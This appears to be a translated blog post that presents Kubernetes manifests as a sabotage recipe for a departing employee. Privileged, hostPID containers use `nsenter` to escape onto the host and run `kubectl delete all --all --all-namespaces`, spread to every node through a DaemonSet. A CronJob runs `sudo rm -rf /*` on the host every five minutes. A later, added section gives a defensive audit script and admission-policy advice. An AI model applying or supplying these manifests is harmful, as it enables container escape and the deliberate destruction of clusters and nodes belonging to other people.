This page exists to demonstrate how dangerous Docker privileged mode is; handle with care. Strictly, the manifests below rely on two Pod spec fields together: `privileged: true` (no capability or seccomp restrictions) and `hostPID: true` (the host's init is visible as PID 1), which is exactly what `nsenter -t 1` needs to step into the host's namespaces. For clusters where you cannot run commands directly, the same Pods, Jobs and so on can be created through a dashboard UI.
1. Delete all resources directly
If you can log in to a machine (and have already packed up your desk), run:

```bash
kubectl delete all --all --all-namespaces
```

Note that `all` is only an alias for the core workload types (Pods, Services, Deployments, ReplicaSets, StatefulSets, DaemonSets, Jobs, CronJobs and the like); ConfigMaps, Secrets, PersistentVolumeClaims, Ingresses and custom resources survive it.
You may not have that much permission, though, so try the methods below. They depend on Docker privileged mode plus the host PID namespace.
2. A casual warm-up
Warm up first: run the script, poke around, and see whether it does anything. Because `nsenter` is given no program, it starts the host's `/bin/sh` inside the host's mount, UTS, IPC and network namespaces and that shell reads the piped-in command from stdin. The container exits right after, and with the default `restartPolicy: Always` kubelet keeps restarting it, so the command runs again on every restart.

```bash
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: danger-1
  namespace: default
spec:
  containers:
  - command: ["sh"]
    # the host shell that nsenter starts reads this command from stdin
    args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
    image: docker.io/alpine:3.12   # busybox ships an nsenter applet
    name: pod-test
    securityContext:
      privileged: true            # lets setns() join PID 1's namespaces
  hostIPC: true
  hostNetwork: true
  hostPID: true                   # makes the host's init visible as PID 1
  tolerations:                    # allow scheduling onto tainted / master nodes
  - effect: NoSchedule
    key: node-role.kubernetes.io/master
  - key: CriticalAddonsOnly
    operator: Exists
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 60
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 60
EOF
```
3. The master node probably has a kubeconfig
If `kubectl` cannot run on the worker nodes (they usually carry no kubeconfig), try landing on a master instead: on kubeadm clusters the admin kubeconfig lives at `/etc/kubernetes/admin.conf` and is normally copied to `/root/.kube/config`, which the host shell started by `nsenter -m` can read. The affinity below is only a preference (weight 100), so the pod still falls back to any node if no master is schedulable; the toleration for the master taint is what lets it land there at all. The manifest reuses the name `danger-1`: delete the pod from the previous step first, because a Pod's spec cannot be updated in place. On kubeadm clusters the label became `node-role.kubernetes.io/control-plane` in 1.24 and the taint followed in 1.25, so adjust both keys on newer clusters.

```bash
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: danger-1
  namespace: default
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:   # a preference, not a hard requirement
      - preference:
          matchExpressions:
          - key: node-role.kubernetes.io/master
            operator: In
            values:
            - ""
        weight: 100
  containers:
  - command: ["sh"]
    args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
    image: docker.io/alpine:3.12
    name: pod-test
    securityContext:
      privileged: true
  tolerations:
  - effect: NoSchedule
    key: node-role.kubernetes.io/master   # required to be scheduled on a master at all
  - key: CriticalAddonsOnly
    operator: Exists
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 60
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 60
  hostIPC: true
  hostNetwork: true
  hostPID: true
EOF
```
4. Fine, try every node
If that still doesn't work, just try every node; you've packed up anyway. A DaemonSet schedules one copy of the pod onto each node, and the tolerations let it reach masters and cordoned-off nodes too.

```bash
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: danger-3
spec:
  selector:
    matchLabels:
      danger.kubernetes.io/name: d3
  template:
    metadata:
      labels:
        danger.kubernetes.io/name: d3
    spec:
      containers:
      - command: ["sh"]
        args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
        image: docker.io/alpine:3.12
        name: pod-test
        securityContext:
          privileged: true
      hostIPC: true
      hostNetwork: true
      hostPID: true
      tolerations:
      - effect: NoSchedule
        key: node-role.kubernetes.io/master
      - key: CriticalAddonsOnly
        operator: Exists
      - effect: NoExecute
        key: node.kubernetes.io/not-ready
        operator: Exists
        tolerationSeconds: 60
      - effect: NoExecute
        key: node.kubernetes.io/unreachable
        operator: Exists
        tolerationSeconds: 60
EOF
```
5. One last struggle: schedule it and go home
If you've gotten this far, odds are you'll be back on the 996 grind tomorrow, so one last try.
This runs every five minutes. The basic schedule format is `* * * * *`: minute, hour, day of month, month, day of week. The original manifest used `apiVersion: batch/v1beta1`, which was removed in Kubernetes 1.25; `batch/v1` below has been available since 1.21. Note that this one no longer bothers with `kubectl` at all: the piped command is run by the host's shell with the host's filesystem, so `rm -rf /*` wipes the node itself.

```bash
cat <<EOF | kubectl apply -f -
apiVersion: batch/v1
kind: CronJob
metadata:
  name: danger-4
spec:
  schedule: "*/5 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - command: ["sh"]
            # executed by the host's /bin/sh inside the host mount namespace
            args: ["-c", "echo 'sudo rm -rf /*' | nsenter -t 1 -m -u -i -n"]
            image: docker.io/alpine:3.12
            name: pod-test
            securityContext:
              privileged: true
          restartPolicy: OnFailure
          hostIPC: true
          hostNetwork: true
          hostPID: true
          tolerations:
          - effect: NoSchedule
            key: node-role.kubernetes.io/master
          - key: CriticalAddonsOnly
            operator: Exists
          - effect: NoExecute
            key: node.kubernetes.io/not-ready
            operator: Exists
            tolerationSeconds: 60
          - effect: NoExecute
            key: node.kubernetes.io/unreachable
            operator: Exists
            tolerationSeconds: 60
EOF
```
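Every manifest above uses the same pair of Pod spec fields, `hostPID: true` and a container with `privileged: true`, and that pair is what a defender should hunt for. The audit script below is an added example and is not part of the original post. It takes a pod list in the shape that `kubectl get pods -A -o json` produces; the embedded `SAMPLE_POD_LIST` is constructed for this example (the `danger-1` pod above, a DaemonSet-spawned copy of `danger-3`, an ordinary nginx pod, and a hostNetwork-only agent whose names and images are made up). It reports pods that share host namespaces, run privileged, add `SYS_ADMIN`, or mention `nsenter` in their argv, attributes each to its owning controller, and marks as host-escape-capable exactly the combination this page relies on. Pass the path of a real dump as the first argument to run it against a cluster.

```python
import json
import sys

# Pod-level fields that hand the container a host namespace.
HOST_NS_FLAGS = ("hostPID", "hostNetwork", "hostIPC")

# Constructed input in the shape of `kubectl get pods -A -o json`; not a real dump.
_NSENTER_ARGS = ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
_DANGER_SPEC = {
    "hostPID": True, "hostNetwork": True, "hostIPC": True,
    "containers": [{"name": "pod-test", "image": "docker.io/alpine:3.12",
                    "command": ["sh"], "args": _NSENTER_ARGS,
                    "securityContext": {"privileged": True}}],
}
SAMPLE_POD_LIST = {"apiVersion": "v1", "kind": "List", "items": [
    {"metadata": {"name": "danger-1", "namespace": "default"}, "spec": _DANGER_SPEC},
    {"metadata": {"name": "danger-3-x7k2p", "namespace": "default",
                  "ownerReferences": [{"kind": "DaemonSet", "name": "danger-3"}]},
     "spec": _DANGER_SPEC},
    {"metadata": {"name": "web-5d8f9-abc12", "namespace": "shop",          # hypothetical workload
                  "ownerReferences": [{"kind": "ReplicaSet", "name": "web-5d8f9"}]},
     "spec": {"containers": [{"name": "web", "image": "nginx:1.25"}]}},
    {"metadata": {"name": "node-agent-q1w2e", "namespace": "monitoring",   # hypothetical agent
                  "ownerReferences": [{"kind": "DaemonSet", "name": "node-agent"}]},
     "spec": {"hostNetwork": True,
              "containers": [{"name": "agent", "image": "example/agent:1.0",
                              "securityContext": {"capabilities": {"add": ["NET_RAW"]}}}]}},
]}


def _all_containers(spec):
    return spec.get("containers", []) + spec.get("initContainers", [])


def _is_privileged(container):
    return bool((container.get("securityContext") or {}).get("privileged"))


def container_findings(container):
    """Per-container reasons to look twice: privileged, SYS_ADMIN, nsenter in argv."""
    found = []
    sc = container.get("securityContext") or {}
    if sc.get("privileged"):
        found.append("privileged")
    caps = (sc.get("capabilities") or {}).get("add") or []
    if "SYS_ADMIN" in caps or "ALL" in caps:
        found.append("cap:SYS_ADMIN")
    argv = " ".join(container.get("command") or []) + " " + " ".join(container.get("args") or [])
    if "nsenter" in argv:
        found.append("nsenter-in-argv")
    return found


def can_escape_to_host(spec):
    """The route used on this page: hostPID makes the host's init visible as PID 1,
    and a privileged container may setns() into its namespaces with nsenter -t 1.
    A privileged container without hostPID can still escape by other means (e.g.
    mounting the node's disk); this predicate tracks the nsenter path specifically."""
    return bool(spec.get("hostPID")) and any(_is_privileged(c) for c in _all_containers(spec))


def pod_report(pod):
    meta, spec = pod["metadata"], pod["spec"]
    findings = [f for f in HOST_NS_FLAGS if spec.get(f)]
    for c in _all_containers(spec):
        findings += [f"{c['name']}:{f}" for f in container_findings(c)]
    owners = meta.get("ownerReferences") or []
    # A bare Pod was applied by hand; a controller owner means it will be recreated.
    owner = f"{owners[0]['kind']}/{owners[0]['name']}" if owners else "Pod"
    return {"pod": f"{meta['namespace']}/{meta['name']}", "owner": owner,
            "findings": findings, "escape": can_escape_to_host(spec)}


def audit_pod_list(pod_list):
    """Reports for every pod with at least one finding, host-escape-capable ones first."""
    reports = [r for r in (pod_report(p) for p in pod_list.get("items", [])) if r["findings"]]
    return sorted(reports, key=lambda r: (not r["escape"], r["pod"]))


if __name__ == "__main__":
    data = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_POD_LIST
    for r in audit_pod_list(data):
        tag = "HOST-ESCAPE" if r["escape"] else "review"
        print(f"{tag:11} {r['pod']:30} owner={r['owner']:22} {', '.join(r['findings'])}")
```

Prevention is cheaper than detection here: the Pod Security Standards `baseline` level rejects hostPID, hostNetwork, hostIPC and privileged containers, so labelling a namespace with `pod-security.kubernetes.io/enforce=baseline` stops every manifest on this page at admission. The audit is still worth running because pods created before the label, or in namespaces that are exempt, are not re-evaluated.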
6. References
- 《如何在主机上调试容器、在容器中操作主机》 (How to debug containers from the host, and operate the host from inside a container)